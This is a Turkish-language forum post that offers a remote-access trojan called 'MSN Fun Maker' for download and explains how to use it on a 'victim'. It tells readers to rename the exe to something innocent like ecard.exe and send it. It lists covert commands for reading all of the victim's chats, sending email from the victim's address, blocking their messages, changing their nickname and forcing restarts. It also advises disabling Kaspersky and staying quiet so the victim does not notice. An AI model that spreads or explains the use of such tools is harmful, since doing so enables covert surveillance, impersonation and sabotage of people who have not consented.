Yalnız Mesajı Göster
Eski 27-04-2006, 05:30 PM
madeinhell kullanıcısının avatarı
madeinhell madeinhell Çevrimdışı
Asil Üye

Giriş: Apr 2006
madeinhell has a brilliant futuremadeinhell has a brilliant futuremadeinhell has a brilliant futuremadeinhell has a brilliant futuremadeinhell has a brilliant futuremadeinhell has a brilliant futuremadeinhell has a brilliant futuremadeinhell has a brilliant futuremadeinhell has a brilliant futuremadeinhell has a brilliant futuremadeinhell has a brilliant future
msn fun maker arkadaslariniz kiminle ne yazısıor gorun

arkadaslar gecenlerde rastladim bir arkadasimiz karsimizdakinin kiminle ne konustuunu goremezmiyiz die bi soru sormustu bende sizler icin msn fun maker ı upload ettim kullaniminida anlatayim tanitiminida yapayim

* Nasıl Kullanılır ?
- Kesinlikle exe yi kendi pcnizde acmayın. Bu dosya karşı tarafa yollanacak (MsnFunMakerV204.EXE)- exe nin adını degiştirebilirsiniz ama uzantısını degiştirmeyin. Yani MsnFunMakerV204.EXE yerine ecard.exe yapabilirsiniz.- Kurbana exe yi yolladınız ve kabul ettiyse dolayısıyla calıştırdıysa ; "Error, couldn’t finde file win32.dll" şeklinde bir hata mesajı alacak ve msn i kapanacakdır. Yani offline oldu ise kurban amacımıza ulaşmışız demektir.- Bu aşamadan sonra kurban sizi engelleyemez (block layamaz) buda şu makımdan önemli aşşagıdaki komutları kurbana yacagımız için engellememesi gerekiyor bizi.- Aşşagıdaki komutları kurbanızla yazışıyor gibi ona mesajı yazdıgımız yere yazıyoruz. Bu komutlar kesinlikle kurban tarafından gözükmüyor

KOMUTLAR :name(...)Kurbanın nickini degiştirir. örnek : name(Dallama) yazarsanız kurbanın nicki dallama olur.
msg(...)Kurbanın pc sinde kücük bi pencerede mesajınız yazar.
www(...) Kurbanın yazdıgınız adresi acmasını saglar.

Geldik asıl olaya : Kurbana gelen bütün mesajlar kurbanın yazdıgı bütün mesajları görürsünüz. bu özelligi kapatmak icin chat penceresini kapatmanız yeterli. tekrar başlamak icin _spy komutunu tekrar yazıyoruz. bide koparsak geri baglanırsak tekrar yazıyoruz.
_message+email+(...)bu komutla kurbanın mail adresinden istediginiz kişiye mail atıyosunuz. maili alan kişide from: kısmında kurbanın maili yazıyor. (...) yerine mesajınızı email yazan yere göndereceginiz mail adresini yazıyosunuz. ama bi şart var maili attıgınız kişi o sırada kurbanla konuşuyor olmalı bunuda zaten _spy komutu ile biliyoruz. örnek : kurban to [/color]d4j1s0n8u2z@hotmail.com diye biriyle konuşuyor olsun.._message+d4j1s0n8u2z@hotmail.com+mesajın ız)
Kurban ın yazdıkları siz haric kimseye gitmez ama o gittigini sanır.

_nosend komutunu kapatır.
_noreceivekurban kimseden ileti alamaz.
_noreceive komutunu kapatır.
Kurbanı logout (cevrimdışı) eder.
Kurbanın pc sine restart atar.
Kurbanın cd rom unu acar.Acıklamarın Hepsini cevirmiyorum Kısaca : 1 ay icinde kendi kendini kaldırıyomuş. devam edecekseniz tekrar yollamanız gerekiyor. firewal lara takılma ihtimali var, şansınız yarı yarıya yani kolay gelsin..

MERAK ETTİGİNİZ SORULARI CEVAPLADIM: NOT: Kurbana eğer yedirirseniz sesizce takılın, resart, cd-rom, nick değiştirme veya bazı şeyleri yapıp onu uyandırmayın yoksa hemen yapacagı FORMAT C: sonrada bir daha ömrünüz boyunca aynı kişiye yediremezsiniz.Kurbana sesizce yaklaşın kiminle ne yazıştıgını öğrenin bu size yeter.UYARI: Kaspersky güvenliginiz için bu exe dosyasını karşı tarafa göndermeyi engelliyecektir ve download eder etmez sizi uyarıcaktır. Bu yüzden bu exe'i yollayacagınız zaman kaspersky'ı kapatın.Bu exe'i bilgisayarınızda tutamıyacaksınız Çünkü Anti virüs Programları bunu engelliyecektir, cd'e çekin download ettikten sonra...

buyrun burdan indirin

rar sifresi : www.arkasokak.net/madeinhell
imza

uyumadan uyandım yine aynı dünyaya. karar verdim kalmaya baktım dedim ki aynaya;
"acelen ne olacaklar olacak bir gün nasılsa
yaşa yaşa, yaşa yaşa seni sevenler var burda
yaşa yaşa, yaşa yaşa sevdiklerin var burda hala"

-+ =Nirvana Fan Club= +-
madeinhell kullanıcısına MSN aracılığı ile mesaj yolla
Alıntı Yaparak Cevapla